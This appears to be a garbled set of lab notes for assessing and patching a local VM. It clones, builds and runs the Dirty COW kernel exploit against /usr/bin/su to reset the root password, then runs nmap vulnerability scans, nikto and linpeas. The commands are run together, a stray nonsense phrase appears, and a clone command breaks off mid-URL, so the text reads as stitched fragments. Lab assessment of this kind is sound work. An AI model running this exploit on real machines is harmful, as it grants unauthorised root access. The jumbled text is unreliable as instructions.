git clone https://github.com/firefart/dirtycow.git cd dirtycow make ./dirtycow /usr/bin/su newrootpassword But since you are patching , instead apply the official mainline fix (requires kernel recompile or using ksplice if available). After applying your custom patches, take a second snapshot:
# Before patch (weak snapshot) nmap --script vuln 192.168.56.101 > weak_scan.txt nmap --script vuln 192.168.56.101 > patched_scan.txt nejicomisimulator tma02 my own dedicated weak patched
diff weak_scan.txt patched_scan.txt
nmap -sV -p- 192.168.56.101 (Host-Only IP) nikto -h http://192.168.56.101 linpeas.sh (run inside VM) Document each weakness in a table: git clone https://github